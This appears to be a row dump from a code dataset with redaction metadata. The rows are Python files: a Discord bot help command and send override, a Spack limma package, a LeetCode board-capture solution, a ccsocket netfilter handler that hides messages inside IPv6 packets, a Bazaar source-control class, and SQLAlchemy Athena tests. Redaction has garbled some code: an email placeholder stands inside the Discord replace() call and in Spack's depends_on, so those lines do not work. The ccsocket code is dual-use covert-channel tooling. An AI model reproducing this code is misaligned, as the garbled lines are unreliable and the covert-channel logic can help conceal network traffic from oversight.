"""Shows this message."""
bot = ctx.bot
destination = ctx.message.author if bot.pm_help else ctx.message.channel
def repl(obj):
return _mentions_transforms.get(obj.group(0), '')
# help by itself just lists our own commands.
if len(commands) == 0:
pages = await bot.formatter.format_help_for(ctx, bot)
elif len(commands) == 1:
# try to see if it is a cog name
name = _mention_pattern.sub(repl, commands[0])
command = None
if name in bot.cogs:
command = bot.cogs[name]
else:
command = bot.all_commands.get(name)
if command is None:
await destination.send(bot.command_not_found.format(name))
return
pages = await bot.formatter.format_help_for(ctx, command)
else:
name = _mention_pattern.sub(repl, commands[0])
command = bot.all_commands.get(name)
if command is None:
await destination.send(bot.command_not_found.format(name))
return
for key in commands[1:]:
try:
key = _mention_pattern.sub(repl, key)
command = command.all_commands.get(key)
if command is None:
await destination.send(bot.command_not_found.format(key))
return
except AttributeError:
await destination.send(bot.command_has_no_subcommands.format(command, key))
return
pages = await bot.formatter.format_help_for(ctx, command)
if bot.pm_help is None:
characters = sum(map(len, pages))
# modify destination based on length of pages.
if characters > 1000:
destination = ctx.message.author
for page in pages:
try:
await destination.send(page)
except discord.Forbidden:
destination = ctx.message.channel
await destination.send(page)
old_send = discord.abc.Messageable.send
async def send(self, content=None, **kwargs):
"""Overrides default send method in order to create a paste if the response is more than 2000 characters"""
if content is not None and any(x in str(content) for x in ["@everyone", "@here"]):
content = content.replace("@everyone", dummy@email.com("@here", "@h\u0435re")
if content is not None and len(str(content)) > 2000:
if content.startswith("```py"):
content = "\n".join(content.split("\n")[1:-1])
paste = await privatebin.upload(content, expires="15min", server=self.bot.priv)
if self.bot.polr:
paste = await polr.shorten(paste, **self.bot.polr)
return await old_send(self, f"Hey, I couldn't handle all the text I was gonna send you, so I put it in a paste!"
f"\nThe link is **{paste}**, but it expires in 15 minutes, so get it quick!",
**kwargs)
else:
return await old_send(self, content, **kwargs)
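
# Hedged note (editor's addition): the module keeps the original coroutine in
# `old_send`, but the monkey-patch itself is not shown in this file; presumably
# the bot's setup code installs the override along the lines of:
#
#   discord.abc.Messageable.send = send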
| 7,157 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Discord.py'], ['PERSON', 'sio = io.'], ['PERSON', 'StringIO'], ['LOCATION', 'parser.print_help'], ['PERSON', 'self.is_cog'], ['PERSON', 'self.is_bot'], ['LOCATION', 'bot.pm_help'], ['LOCATION', 'bot.pm_help'], ['DATE_TIME', '15 minutes'], ['URL', 'Discord.py'], ['URL', 'discord.ext.com'], ['URL', 'bot.utils.ar'], ['URL', 'cmd.pa'], ['URL', 'cmd.si'], ['URL', 'io.St'], ['URL', 'contextlib.red'], ['URL', 'parser.pr'], ['URL', 'sio.se'], ['URL', 'sio.re'], ['URL', 'cmd.si'], ['URL', 'cmd.us'], ['URL', 'self.command.de'], ['URL', 'self.is'], ['URL', 'inspect.ge'], ['URL', 'self.com'], ['URL', 'paginator.ad'], ['URL', 'self.com'], ['URL', 'self.command.params.ge'], ['URL', 'self.command.pa'], ['URL', 'self.command.us'], ['URL', 'self.com'], ['URL', 'self.command.pa'], ['URL', '.annotation.pa'], ['URL', 'self.ge'], ['URL', 'paginator.ad'], ['URL', 'self.com'], ['URL', 'paginator.ad'], ['URL', 'self.com'], ['URL', 'paginator.cl'], ['URL', 'paginator.pa'], ['URL', 'self.ma'], ['URL', 'self.fi'], ['URL', 'self.is'], ['URL', 'itertools.gr'], ['URL', 'paginator.ad'], ['URL', 'paginator.ad'], ['URL', 'paginator.ad'], ['URL', 'self.ge'], ['URL', 'paginator.ad'], ['URL', 'paginator.pa'], ['URL', 're.com'], ['URL', 'transforms.ke'], ['URL', 'child.st'], ['URL', 'ctx.bo'], ['URL', 'ctx.message.au'], ['URL', 'bot.pm'], ['URL', 'ctx.message.ch'], ['URL', 'transforms.ge'], ['URL', 'obj.gr'], ['URL', 'bot.formatter.fo'], ['URL', 'pattern.su'], ['URL', 'bot.co'], ['URL', 'bot.co'], ['URL', 'bot.al'], ['URL', 'commands.ge'], ['URL', 'destination.se'], ['URL', 'bot.com'], ['URL', 'found.fo'], ['URL', 'bot.formatter.fo'], ['URL', 'pattern.su'], ['URL', 'bot.al'], ['URL', 'commands.ge'], ['URL', 'destination.se'], ['URL', 'bot.com'], ['URL', 'found.fo'], ['URL', 'pattern.su'], ['URL', 'command.al'], ['URL', 'commands.ge'], ['URL', 'destination.se'], ['URL', 'bot.com'], ['URL', 'found.fo'], ['URL', 'destination.se'], ['URL', 'bot.com'], ['URL', 'subcommands.fo'], ['URL', 'bot.formatter.fo'], ['URL', 'bot.pm'], ['URL', 'ctx.message.au'], ['URL', 'destination.se'], ['URL', 'discord.Fo'], ['URL', 'ctx.message.ch'], ['URL', 'destination.se'], ['URL', 'discord.abc.Messageable.se'], ['URL', 'content.re'], ['URL', 'email.com'], ['URL', 'content.st'], ['URL', 'self.bot.pr'], ['URL', 'self.bo'], ['URL', 'polr.sh'], ['URL', 'self.bo']] |
59 | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, dummy@email.com, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RLimma(RPackage):
"""Data analysis, linear models and differential expression
for microarray data."""
homepage = "https://www.bioconductor.org/packages/limma/"
url = "https://git.bioconductor.org/packages/limma"
list_url = homepage
version('3.32.10', git='https://git.bioconductor.org/packages/limma', commit='PI:KEY')
version('3.32.6', 'PI:KEY')
    depends_on('dummy@email.com', 'dummy@email.com')
| 1,694 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'https://git.bioconductor.org/packages/limma"'], ['URL', "https://git.bioconductor.org/packages/limma',"], ['DATE_TIME', '2013-2017'], ['PERSON', 'Todd Gamblin'], ['DATE_TIME', 'February 1999'], ['LOCATION', 'Boston'], ['LOCATION', 'USA'], ['URL', 'https://github.com/llnl/spack'], ['URL', 'https://www.bioconductor.org/packages/limma/"'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com']] |
60 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
*****************************************
Author: zhlinh
Email: dummy@email.com
Version: 0.0.1
Created Time: 2016-03-11
Last_modify: 2016-03-11
******************************************
'''
'''
Given a 2D board containing 'X' and 'O',
capture all regions surrounded by 'X'.
A region is captured by flipping all 'O's
into 'X's in that surrounded region.
For example,
X X X X
X O O X
X X O X
X O X X
After running your function, the board should be:
X X X X
X X X X
X X X X
X O X X
'''
class Solution(object):
def solve(self, board):
"""
:type board: List[List[str]]
:rtype: void Do not return anything, modify board in-place instead.
"""
m = len(board)
if m < 2:
return
n = len(board[0])
for i in range(m):
self.helper(board, i, 0, m, n)
if n > 1:
self.helper(board, i, n - 1, m, n)
for j in range(n):
self.helper(board, 0, j, m, n)
if m > 1:
self.helper(board, m - 1, j, m, n)
for i in range(m):
for j in range(n):
if board[i][j] == 'O':
board[i][j] = 'X'
if board[i][j] == '1':
board[i][j] = 'O'
def helper(self, board, i, j, m, n):
if board[i][j] == 'O':
board[i][j] = '1'
        # Trick: normally the guard could be i >= 1, but the boundary
        # cells are always visited directly, so recursing from i == 1
        # back into row 0 would only duplicate work.
if i > 1:
self.helper(board, i - 1, j, m, n)
if i < m - 2:
self.helper(board, i + 1, j, m, n)
if j > 1:
self.helper(board, i, j - 1, m, n)
if j < n - 2:
self.helper(board, i, j + 1, m, n)
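
# Hedged demo (editor's addition): reproduces the example from the docstring.
if __name__ == '__main__':
    board = [list('XXXX'), list('XOOX'), list('XXOX'), list('XOXX')]
    Solution().solve(board)
    print([''.join(row) for row in board])
    # expected: ['XXXX', 'XXXX', 'XXXX', 'XOXX']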
| 1,908 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2016-03-11'], ['DATE_TIME', '2016-03-11'], ['URL', 'email.com']] |
61 | #!/usr/bin/python
# -*- coding: UTF-8 -*-
## This file is part of ccsocket
## Copyright (C) Tomas Dragoun dummy@email.com
## This program is published under a GPLv3 license
########################################################
import nfqueue
import sys
import signal
from multiprocessing import Process, Pipe, Lock
from socket import AF_INET6
from scapy.all import *
from scapy.layers.inet6 import ICMPv6Unknown
from headers import IPv6ExtHdrAH
from constants import Constants
############################
## ##
## NFQHandler ##
## ##
############################
class NFQHandler(Process):
#----------------------------------------------------------------------------------
'''
    This class handles a netfilter queue. It is connected to a parent
    process via a pipe. Messages are decoded and removed from incoming
    packets and the data are sent through the pipe. In passive mode the
    queue intercepts both incoming and outgoing traffic. Inherits
    multiprocessing.Process.
'''
#----------------------------------------------------------------------------------
def __init__(self, encoder, pipe, sendevt, stopevt, proto, active, address):
''' Call parent's constructor at first '''
Process.__init__(self) # init parent (multiprocessing.Process)
self.name = 'NFQHandler-port ' + str(address[1])
self.daemon = True # set process daemonic
''' Initialize class attributes '''
self._const = Constants()
self._encoder = encoder # encodes message in packet
self._pipe = pipe # exchange data with parent process via pipe
self._can_send = sendevt # event shared with parent process
self._stop_send = stopevt # event shared with parent process
self._proto = proto # upper-layer protocol
self._active = active # mode
self._host = address[0]
self._port = address[1]
'''
        Following steps prepare the netfilter queue with _port as the queue
number. There is always only one active queue associated
with given number.
'''
self._queue = nfqueue.queue() # create queue
self._queue.open() # open queue
try:
self._queue.bind(AF_INET6) # set family type AF_INET6
except: # fails when any other queue already runs
pass
self._queue.set_callback(self.handlepacket) # set queue callback
'''
Final step raises RuntimeError in case there is some other
queue with the same number active, queue wasn't closed
        properly or the user's privileges are insufficient.
'''
try:
self._queue.create_queue(self._port)
except Exception, e:
raise e
#----------------------------------------------------------------------------------
def __del__(self):
if self._pipe: # close connection with parent process
self._pipe.close()
#----------------------------------------------------------------------------------
def destroyqueue(self):
''' Attempts to close queue '''
if self._queue:
#print 'stopping queue ' + str(self._port)
self._queue.close() # close queue
self._queue = None
#----------------------------------------------------------------------------------
def _clear(self):
''' Removes all data to send from pipe and sets state to idle '''
while self._pipe.poll(): # clear pipe
self._pipe.recv()
self._can_send.set()
self._stop_send.clear()
#----------------------------------------------------------------------------------
def run(self):
'''
        Runs an endless loop. Every time a packet appears in the queue
        the handlepacket callback is invoked.
'''
#print 'starting queue ' + str(self._port)
self._queue.try_run()
#----------------------------------------------------------------------------------
def handlepacket(self, number, payload):
''' Queue callback function '''
packet = IPv6(payload.get_data()) # decode packet from queue as IPv6
'''
Check if packet belongs to this queue - upperlayer ID field must match
in active mode.
'''
modify, reroute = self._checkport(packet)
if not modify:
'''
Reroute packet to correct queue. Verdict NF_QUEUE is 32-bit
number. Lower 16 bits code this verdict and upper 16 bits
are used to identify target queue.
'''
if reroute != -1:
error = payload.set_verdict(nfqueue.NF_QUEUE | (reroute << 16))
if not error:
return
'''
Packet doesn't have icmp echo layer or target port isn't active,
accept packet
'''
payload.set_verdict(nfqueue.NF_ACCEPT)
return
'''
Port is ok, we need to check if address matches. Ip6tables rules filter
addresses, but packet might have been rerouted from other queue.
'''
if len(self._host): # check source/destination address
if packet.src != self._host and packet.dst != self._host:
payload.set_verdict(nfqueue.NF_ACCEPT)
return
'''
Nfqueue mark is used to distinguish between incoming and outgoing
packets. Each packet is marked.
'''
mark = payload.get_nfmark() # get mark of this packet
if mark == 1: # incoming packet
self._incoming(packet, payload)
elif mark == 2: # outgoing packet
self._outgoing(packet, payload)
#----------------------------------------------------------------------------------
def _incoming(self, packet, payload):
message = self._encoder.getmessage(packet) # decode message
if message is None: # no message
''' Accept packet '''
payload.set_verdict(nfqueue.NF_ACCEPT)
else:
''' Remove message and pass modified packet to queue '''
modified_packet = self._encoder.removemessage(packet)
payload.set_verdict_modified(nfqueue.NF_ACCEPT,
str(modified_packet),
len(modified_packet))
try:
if not len(message):
return
except:
pass
self._pipe.send((message, (packet.src, self._port, 0, 0)))
#----------------------------------------------------------------------------------
def _outgoing(self, packet, payload):
if self._stop_send.is_set():
self._clear()
if self._pipe.poll(): # any data to send?
message = self._pipe.recv() # get message
''' Encode message and return modified packet to queue '''
modified_packet = self._encoder.addmessage(message, (packet, None))
payload.set_verdict_modified(nfqueue.NF_ACCEPT,
str(modified_packet),
len(modified_packet))
if not self._pipe.poll(): # sending finished
self._can_send.set()
else: # nothing to send, return packet to queue
payload.set_verdict(nfqueue.NF_ACCEPT)
#----------------------------------------------------------------------------------
def _checkport(self, packet):
'''
        Returns a tuple (bool, value). True if the packet belongs to this
        queue; in passive mode this is always True. In active mode the
        upper-layer id field must match the current _port number. Value is
        the number of the queue the packet should be rerouted to.
'''
''' Passive mode - override icmp id check '''
if not self._active:
return (True, 0)
''' Active mode - check icmp (or fragment) id field (~ represents port) '''
if packet.haslayer(ICMPv6EchoRequest): # upperlayer ICMPv6EchoRequest
id = packet[ICMPv6EchoRequest].id
elif packet.haslayer(ICMPv6EchoReply): # upperlayer ICMPv6EchoReply
id = packet[ICMPv6EchoReply].id
elif packet.haslayer(IPv6ExtHdrFragment): # fragmented packet
id = packet[IPv6ExtHdrFragment].id
elif packet.haslayer(ICMPv6Unknown) and packet.haslayer(IPv6ExtHdrAH):
type = packet[ICMPv6Unknown].type # ICMPv6 packet with AH
if type != 128 and type != 129:
return (False, -1) # accept packet
packet[IPv6ExtHdrAH].decode_payload_as(ICMPv6EchoRequest)
id = packet[ICMPv6EchoRequest].id
elif self._proto == self._const.PROTO_ALL: # any protocol
return (True, 0) # id matches port number
else:
return (False, -1) # accept packet
if id == self._port:
return (True, 0) # id matches port number
else:
return (False, id) # reroute to correct queue
#----------------------------------------------------------------------------------
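    # Hedged usage sketch (editor's addition, not part of ccsocket): a parent
    # process would wire the handler up roughly like this, assuming an encoder
    # object and multiprocessing.Event instances for the two shared events:
    #
    #   parent_conn, child_conn = Pipe()
    #   handler = NFQHandler(encoder, child_conn, can_send, stop_send,
    #                        proto, active=True, address=('::1', 8000))
    #   handler.start()              # runs the nfqueue loop in a child process
    #   parent_conn.send(message)    # data to embed into outgoing packets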
| 9,616 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Tomas Dragoun'], ['PERSON', 'GPLv3'], ['LOCATION', '#'], ['LOCATION', '#'], ['LOCATION', 'stopevt'], ['PERSON', 'self._active'], ['PERSON', 'Verdict NF_QUEUE'], ['PERSON', 'upperlayer ICMPv6EchoRequest\n i'], ['PERSON', 'AH'], ['URL', 'email.com'], ['URL', 'scapy.al'], ['URL', 'scapy.layers.in'], ['URL', 'multiprocessing.Pro'], ['URL', 'multiprocessing.Pro'], ['URL', 'self.na'], ['URL', 'queue.bi'], ['URL', 'queue.se'], ['URL', 'queue.cr'], ['URL', 'pipe.cl'], ['URL', 'queue.cl'], ['URL', 'pipe.re'], ['URL', 'send.se'], ['URL', 'send.cl'], ['URL', 'queue.tr'], ['URL', 'payload.ge'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'packet.sr'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'payload.ge'], ['URL', 'encoder.ge'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'encoder.re'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'pipe.se'], ['URL', 'packet.sr'], ['URL', 'send.is'], ['URL', 'pipe.re'], ['URL', 'encoder.ad'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'send.se'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'const.PRO']] |
62 | ###############################################################################
# Name: Cody Precord #
# Purpose: SourceControl implementation for Bazaar #
# Author: Cody Precord dummy@email.com #
# Copyright: (c) 2008 Cody Precord dummy@email.com #
# License: wxWindows License #
###############################################################################
"""Bazaar implementation of the SourceControl object """
__author__ = "Cody Precord dummy@email.com"
__revision__ = "$Revision: 867 $"
__scid__ = "$Id: BZR.py 867 2009-05-06 12:10:55Z CodyPrecord $"
#------------------------------------------------------------------------------#
# Imports
import os
import datetime
import re
import time
# Local imports
from SourceControl import SourceControl, DecodeString
#------------------------------------------------------------------------------#
class BZR(SourceControl):
""" Bazaar source control class """
name = 'Bazaar'
command = 'bzr'
ccache = list() # Cache of paths that are under bazaar control
repocache = dict()
def __repr__(self):
return 'BZR.BZR()'
def getAuthOptions(self, path):
""" Get the repository authentication info """
output = []
return output
def getRepository(self, path):
""" Get the repository of a given path """
if path in self.repocache:
return self.repocache[path]
if not os.path.isdir(path):
root = os.path.split(path)[0]
else:
root = path
while True:
if not root:
break
if os.path.exists(os.path.join(root, '.bzr')):
break
else:
root = os.path.split(root)[0]
# Cache the repo of this path for faster lookups next time
self.repocache[path] = root
return root
def isControlled(self, path):
""" Is the path controlled by BZR? """
t1 = time.time()
# Check for cached paths to speed up lookup
if path in self.ccache:
return True
if not os.path.isdir(path):
root = os.path.split(path)[0]
else:
root = path
last = False
while True:
if os.path.exists(os.path.join(root, '.bzr')):
# If a containing directory of the given path has a .bzr
# directory in it run status to find out if the file is being
# tracked or not.
retval = False
out = self.run(root + os.sep, ['status', '-S', path])
if out:
lines = out.stdout.readline()
if lines.startswith('?'):
fname = lines.split(None, 1)[1].strip()
fname = fname.rstrip(os.sep)
retval = not path.endswith(fname)
else:
retval = True
self.closeProcess(out)
if retval:
self.ccache.append(path)
return retval
elif last:
break
else:
root, tail = os.path.split(root)
# If tail is None or '' then this has gotten to the root
# so mark it as the last run
if not tail:
last = True
return False
def add(self, paths):
""" Add paths to the repository """
root, files = self.splitFiles(paths)
out = self.run(root, ['add'] + files)
self.logOutput(out)
self.closeProcess(out)
def checkout(self, paths):
""" Checkout files at the given path """
root, files = self.splitFiles(paths)
out = self.run(root, ['checkout',], files)
self.logOutput(out)
self.closeProcess(out)
def commit(self, paths, message=''):
""" Commit paths to the repository """
root, files = self.splitFiles(paths)
out = self.run(root, ['commit', '-m', message] + files)
self.logOutput(out)
self.closeProcess(out)
def diff(self, paths):
""" Run the diff program on the given files """
root, files = self.splitFiles(paths)
out = self.run(root, ['diff'] + files)
self.closeProcess(out)
def makePatch(self, paths):
""" Make a patch of the given paths """
root, files = self.splitFiles(paths)
patches = list()
for fname in files:
out = self.run(root, ['diff', fname])
lines = [ line for line in out.stdout ]
self.closeProcess(out)
patches.append((fname, ''.join(lines)))
return patches
def history(self, paths, history=None):
""" Get the revision history of the given paths """
if history is None:
history = []
root, files = self.splitFiles(paths)
for fname in files:
out = self.run(root, ['log', fname])
logstart = False
if out:
for line in out.stdout:
self.log(line)
if line.strip().startswith('-----------'):
logstart = False
current = dict(path=fname, revision=None,
author=None, date=None, log=u'')
history.append(current)
elif line.startswith('message:'):
logstart = True
elif logstart:
current['log'] += DecodeString(line)
elif line.startswith('revno:'):
current['revision'] = DecodeString(line.split(None, 1)[-1].strip())
elif line.startswith('committer:'):
author = line.split(None, 1)[-1]
current['author'] = DecodeString(author.strip())
elif line.startswith('timestamp:'):
date = line.split(None, 1)[-1]
current['date'] = self.str2datetime(date.strip())
else:
pass
self.logOutput(out)
self.closeProcess(out)
return history
def str2datetime(self, tstamp):
""" Convert a timestamp string to a datetime object """
parts = tstamp.split()
ymd = [int(x.strip()) for x in parts[1].split('-')]
hms = [int(x.strip()) for x in parts[2].split(':')]
date = ymd + hms
return datetime.datetime(*date)
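    # Worked example (editor's addition): a bzr 'timestamp:' value such as
    #   'Wed 2009-05-06 12:10:55 +0200'
    # splits into parts where parts[1] is the date and parts[2] the time,
    # yielding datetime(2009, 5, 6, 12, 10, 55); the weekday and UTC offset
    # are ignored.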
def remove(self, paths):
""" Recursively remove paths from repository """
root, files = self.splitFiles(paths)
out = self.run(root, ['remove', '--force'] + files)
self.logOutput(out)
    def status(self, paths, recursive=False, status=None):
        """ Get BZR status information from given file/directory """
        if status is None:
            status = dict()
codes = {' ':'uptodate', 'N':'added', 'C':'conflict', 'D':'deleted',
'M':'modified'}
root, files = self.splitFiles(paths)
# -S gives output similar to svn which is a little easier to work with
out = self.run(root, ['status', '-S'] + files)
repo = self.getRepository(paths[0])
relpath = root.replace(repo, '', 1).lstrip(os.sep)
unknown = list()
if out:
for line in out.stdout:
self.log(line)
txt = line.lstrip(' +-')
# Split the status code and relative file path
code, fname = txt.split(None, 1)
fname = fname.replace(u'/', os.sep).strip().rstrip(os.sep)
fname = fname.replace(relpath, '', 1).lstrip(os.sep)
code = code.rstrip('*')
# Skip unknown files
if code == '?':
unknown.append(fname)
continue
# Get the absolute file path
current = dict()
try:
current['status'] = codes[code]
status[fname] = current
except KeyError:
pass
# Find up to date files
unknown += status.keys()
for path in os.listdir(root):
if path not in unknown:
status[path] = dict(status='uptodate')
self.logOutput(out)
return status
def update(self, paths):
""" Recursively update paths """
root, files = self.splitFiles(paths)
out = self.run(root, ['update'] + files)
self.logOutput(out)
def revert(self, paths):
""" Recursively revert paths to repository version """
root, files = self.splitFiles(paths)
if not files:
files = ['.']
out = self.run(root, ['revert'] + files)
self.logOutput(out)
def fetch(self, paths, rev=None, date=None):
""" Fetch a copy of the paths' contents """
output = []
for path in paths:
if os.path.isdir(path):
continue
root, files = self.splitFiles(path)
options = []
if rev:
options.append('-r')
options.append(str(rev))
if date:
# Date format YYYY-MM-DD,HH:MM:SS
options.append('-r')
options.append('date:%s' % date)
out = self.run(root, ['cat'] + options + files)
if out:
output.append(out.stdout.read())
self.logOutput(out)
else:
output.append(None)
return output
| 9,977 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Cody Precord '], ['PERSON', 'Cody Precord'], ['PERSON', 'Cody Precord'], ['PERSON', 'Cody Precord'], ['DATE_TIME', '2009-05-06'], ['LOCATION', 'self.ccache'], ['PERSON', 'fname = lines.split(None'], ['PERSON', 'fname'], ['PERSON', 'logstart'], ['PERSON', '= line.split(None'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'BZR.py'], ['URL', 'BZR.BZ'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'os.path.is'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'self.re'], ['URL', 'self.cc'], ['URL', 'os.path.is'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'self.ru'], ['URL', 'os.se'], ['URL', 'out.stdout.re'], ['URL', 'lines.st'], ['URL', 'fname.rs'], ['URL', 'os.se'], ['URL', 'self.cl'], ['URL', 'self.cc'], ['URL', 'os.pa'], ['URL', 'self.ru'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'out.st'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'out.st'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'author.st'], ['URL', 'line.st'], ['URL', 'self.st'], ['URL', 'date.st'], ['URL', 'self.cl'], ['URL', 'x.st'], ['URL', 'x.st'], ['URL', 'self.ru'], ['URL', 'self.ru'], ['URL', 'self.ge'], ['URL', 'root.re'], ['URL', 'os.se'], ['URL', 'out.st'], ['URL', 'line.ls'], ['URL', 'fname.re'], ['URL', 'os.se'], ['URL', 'os.se'], ['URL', 'fname.re'], ['URL', 'os.se'], ['URL', 'code.rs'], ['URL', 'status.ke'], ['URL', 'os.li'], ['URL', 'self.ru'], ['URL', 'self.ru'], ['URL', 'os.path.is'], ['URL', 'self.ru'], ['URL', 'out.stdout.re']] |
63 | # -*- coding: utf-8 -*-
import re
import unittest
import uuid
from datetime import date, datetime
from decimal import Decimal
from urllib.parse import quote_plus
import numpy as np
import pandas as pd
import sqlalchemy
from sqlalchemy import String
from sqlalchemy.engine import create_engine
from sqlalchemy.exc import NoSuchTableError, OperationalError, ProgrammingError
from sqlalchemy.sql import expression
from sqlalchemy.sql.schema import Column, MetaData, Table
from sqlalchemy.sql.sqltypes import (
BIGINT,
BINARY,
BOOLEAN,
DATE,
DECIMAL,
FLOAT,
INTEGER,
STRINGTYPE,
TIMESTAMP,
)
from tests.conftest import ENV, SCHEMA
from tests.util import with_engine
class TestSQLAlchemyAthena(unittest.TestCase):
"""Reference test case is following:
https://github.com/dropbox/PyHive/blob/master/pyhive/tests/sqlalchemy_test_case.py
https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_hive.py
https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_presto.py
"""
def create_engine(self, **kwargs):
conn_str = (
"awsathena+rest://athena.{region_name}.amazonaws.com:443/"
+ "{schema_name}?s3_staging_dir={s3_staging_dir}&s3_dir={s3_dir}"
+ "&compression=snappy"
)
if "verify" in kwargs:
conn_str += "&verify={verify}"
if "duration_seconds" in kwargs:
conn_str += "&duration_seconds={duration_seconds}"
if "poll_interval" in kwargs:
conn_str += "&poll_interval={poll_interval}"
if "kill_on_interrupt" in kwargs:
conn_str += "&kill_on_interrupt={kill_on_interrupt}"
return create_engine(
conn_str.format(
region_name=ENV.region_name,
schema_name=SCHEMA,
s3_staging_dir=quote_plus(ENV.s3_staging_dir),
s3_dir=quote_plus(ENV.s3_staging_dir),
**kwargs
)
)
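    # For reference (editor's addition; region and bucket are placeholders),
    # the rendered connection string looks like:
    #   awsathena+rest://athena.us-east-1.amazonaws.com:443/test_schema
    #     ?s3_staging_dir=s3%3A%2F%2Fbucket%2Fpath%2F&s3_dir=...&compression=snappy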
@with_engine()
def test_basic_query(self, engine, conn):
rows = conn.execute("SELECT * FROM one_row").fetchall()
self.assertEqual(len(rows), 1)
self.assertEqual(rows[0].number_of_rows, 1)
self.assertEqual(len(rows[0]), 1)
@with_engine()
def test_reflect_no_such_table(self, engine, conn):
self.assertRaises(
NoSuchTableError,
lambda: Table("this_does_not_exist", MetaData(bind=engine), autoload=True),
)
self.assertRaises(
NoSuchTableError,
lambda: Table(
"this_does_not_exist",
MetaData(bind=engine),
schema="also_does_not_exist",
autoload=True,
),
)
@with_engine()
def test_reflect_table(self, engine, conn):
one_row = Table("one_row", MetaData(bind=engine), autoload=True)
self.assertEqual(len(one_row.c), 1)
self.assertIsNotNone(one_row.c.number_of_rows)
@with_engine()
def test_reflect_table_with_schema(self, engine, conn):
one_row = Table("one_row", MetaData(bind=engine), schema=SCHEMA, autoload=True)
self.assertEqual(len(one_row.c), 1)
self.assertIsNotNone(one_row.c.number_of_rows)
@with_engine()
def test_reflect_table_include_columns(self, engine, conn):
one_row_complex = Table("one_row_complex", MetaData(bind=engine))
version = float(
re.search(r"^([\d]+\.[\d]+)\..+", sqlalchemy.__version__).group(1)
)
if version <= 1.2:
engine.dialect.reflecttable(
conn, one_row_complex, include_columns=["col_int"], exclude_columns=[]
)
elif version == 1.3:
# https://docs.sqlalchemy.org/en/13/changelog/changelog_13.html
# #PI:KEY
engine.dialect.reflecttable(
conn,
one_row_complex,
include_columns=["col_int"],
exclude_columns=[],
resolve_fks=True,
)
else: # version >= 1.4
# https://docs.sqlalchemy.org/en/14/changelog/changelog_14.html
# #change-0215fae622c01f9409eb1ba2754f4792
# https://docs.sqlalchemy.org/en/14/core/reflection.html
# #sqlalchemy.engine.reflection.Inspector.reflect_table
insp = sqlalchemy.inspect(engine)
insp.reflect_table(
one_row_complex,
include_columns=["col_int"],
exclude_columns=[],
resolve_fks=True,
)
self.assertEqual(len(one_row_complex.c), 1)
self.assertIsNotNone(one_row_complex.c.col_int)
self.assertRaises(AttributeError, lambda: one_row_complex.c.col_tinyint)
@with_engine()
def test_unicode(self, engine, conn):
unicode_str = "密林"
one_row = Table("one_row", MetaData(bind=engine))
returned_str = sqlalchemy.select(
[expression.bindparam("あまぞん", unicode_str, type_=String())],
from_obj=one_row,
).scalar()
self.assertEqual(returned_str, unicode_str)
@with_engine()
def test_reflect_schemas(self, engine, conn):
insp = sqlalchemy.inspect(engine)
schemas = insp.get_schema_names()
self.assertIn(SCHEMA, schemas)
self.assertIn("default", schemas)
@with_engine()
def test_get_table_names(self, engine, conn):
meta = MetaData()
meta.reflect(bind=engine)
print(meta.tables)
self.assertIn("one_row", meta.tables)
self.assertIn("one_row_complex", meta.tables)
insp = sqlalchemy.inspect(engine)
self.assertIn(
"many_rows",
insp.get_table_names(schema=SCHEMA),
)
@with_engine()
def test_has_table(self, engine, conn):
insp = sqlalchemy.inspect(engine)
self.assertTrue(insp.has_table("one_row", schema=SCHEMA))
self.assertFalse(insp.has_table("this_table_does_not_exist", schema=SCHEMA))
@with_engine()
def test_get_columns(self, engine, conn):
insp = sqlalchemy.inspect(engine)
actual = insp.get_columns(table_name="one_row", schema=SCHEMA)[0]
self.assertEqual(actual["name"], "number_of_rows")
self.assertTrue(isinstance(actual["type"], INTEGER))
self.assertTrue(actual["nullable"])
self.assertIsNone(actual["default"])
self.assertEqual(actual["ordinal_position"], 1)
self.assertIsNone(actual["comment"])
